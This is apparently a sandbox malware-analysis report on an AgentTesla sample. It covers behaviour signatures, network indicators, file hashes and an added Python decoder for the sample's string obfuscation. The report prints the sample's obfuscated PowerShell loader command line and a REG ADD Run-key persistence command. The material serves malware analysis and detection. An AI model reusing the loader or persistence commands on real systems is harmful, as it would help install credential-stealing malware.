Analysis Overview
SHA256
2fdc62f0c245dab001e0b35dbbddcfc1cd9d8eedb95a22149914a4a4a646f495
Threat Level: Known bad
The file FA46969-OVERSEAS 2024.arj.zip was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 09:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 09:26
Reported
2024-06-19 09:28
Platform
win7-20240221-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 280 set thread context of 2640 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FA46969-OVERSEAS 2024.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6H0F3SJSWIAZ7Y2PWUO.temp
C:\Users\Admin\AppData\Roaming\Restauratrens.Alb
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 09:26
Reported
2024-06-19 09:28
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2380 wrote to memory of 1388 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1388 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1388 wrote to memory of 2404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1388 wrote to memory of 2404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FA46969-OVERSEAS 2024.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
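The `Solidariske` function at the start of the command line above is the entire obfuscation layer: every literal is 7 filler characters followed by one real character, repeated, with a 7-character tail and a trailing space, and the loop `For($i=7; $i -lt $len-1; $i+=8)` picks out the real characters with `Substring($i,1)`. `Sittas` then dot-sources `iex` on the decoded text. The Python below is an added decoder written for this report; it is not part of the sandbox output or of the sample. The three literals in `SAMPLE_SCRIPT` are copied from the command line above; the `obfuscate` and `rendered` helpers and the filler words `Nonprog`, `Attitud` and ` tillet` are constructed for the demonstration. One caveat matters in practice: the report page renders the command line with runs of whitespace collapsed to a single space, so any literal in which a real space is followed by a filler word that begins with a space has lost a character here (for example the `Mozilla/5.0` User-Agent literal, where the spaces before `Damokl` and `Abduce` are gone), and decoding it from the rendered page drifts from that point on. The `is_aligned` check catches this, and the fix is to decode from the raw command line exported from the sandbox rather than from the HTML.

```python
"""Decoder for the every-8th-character string obfuscation used by the
PowerShell stage above. Added example, not part of the sandbox report."""
import re

# Obfuscated literals copied verbatim from the command line above. These three
# are short enough to have survived the page's whitespace collapsing intact.
SAMPLE_SCRIPT = (
    "$Termografens=Solidariske ' Blatti>Trendin ';"
    "$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';"
    "$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr "
    "Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';"
)

LITERAL_RE = re.compile(r"Solidariske\s+'([^']*)'")


def decode(literal, start=7, step=8):
    """Mirror of Solidariske: literal[i] for i = 7, 15, 23, ... while i < len-1.
    The trailing space of a well-formed literal is never reached."""
    out = []
    i = start
    while i < len(literal) - 1:
        out.append(literal[i])
        i += step
    return "".join(out)


def is_aligned(literal, step=8):
    """Each real character costs 7 filler + 1 real, and the tail is 7 filler
    plus a space, so an intact literal has a length divisible by 8. A double
    space collapsed by an HTML renderer leaves the length at 7 mod 8."""
    return len(literal) % step == 0


def decode_script(script):
    """Map every Solidariske '...' literal in a script to (decoded, aligned)."""
    return {
        m.group(1): (decode(m.group(1)), is_aligned(m.group(1)))
        for m in LITERAL_RE.finditer(script)
    }


# --- Constructed data to show the whitespace-collapse failure mode -----------
FILLERS = ["Nonprog", "Attitud", " tillet"]  # constructed 7-char fillers


def obfuscate(plain, fillers=FILLERS):
    """Inverse of decode, used only to build test data in the sample's layout:
    7 filler chars before each real char, then a 7-char tail and a space."""
    assert all(len(f) == 7 for f in fillers)
    body = "".join(fillers[i % len(fillers)] + c for i, c in enumerate(plain))
    return body + fillers[len(plain) % len(fillers)] + " "


def rendered(literal):
    """What an HTML page shows: any run of whitespace collapsed to one space."""
    return re.sub(r"\s{2,}", " ", literal)


if __name__ == "__main__":
    for lit, (plain, ok) in decode_script(SAMPLE_SCRIPT).items():
        print(f"{'ok ' if ok else 'BAD'} {plain!r:<14} <- {lit!r}")
    raw = obfuscate("echo t")          # real space followed by ' tillet'
    print(decode(raw), is_aligned(raw))                    # echo t True
    print(decode(rendered(raw)), is_aligned(rendered(raw)))  # echo N False
```

Run the decoder over the full command line from the sandbox's raw export; literals that come back with `aligned == False` have been mangled in transit and should not be trusted, which on this page includes the User-Agent string and the `echo %appdata%\...` command that the `cmd.exe` line below shows in decoded form.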
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 5c220ed75280c181214fd09e1eed5be5 |
| SHA1 | 8632a068505754d734915e2cdb4b23fca1324e3b |
| SHA256 | 2c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088 |
| SHA512 | 5422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a |
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 8f55743455974f961a2b5864f35c10be |
| SHA1 | 8d0aef5285f4d48b85f72dc139f65d37a75fa681 |
| SHA256 | e896daf302a853028fedaefce97714ff5477c66a56507346993e60233d610cb6 |
| SHA512 | e6c68745a173913de592313f99284c553c42e7a3823897c33ab09a846a5af80bc018344f878f18434219eb8f496416a13edccd3c756767a8212d55d9550e1740 |
memory/1388-342-0x00007FFDE6193000-0x00007FFDE6195000-memory.dmp
memory/1388-343-0x0000025733100000-0x0000025733122000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gebpbkxr.2sc.ps1 (written by powershell.exe itself when it probes the AppLocker/WDAC script policy at start-up; an artifact of running PowerShell, not a file dropped by the sample)
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1388-353-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-354-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-355-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-356-0x00007FFDE6193000-0x00007FFDE6195000-memory.dmp
memory/1388-357-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-358-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp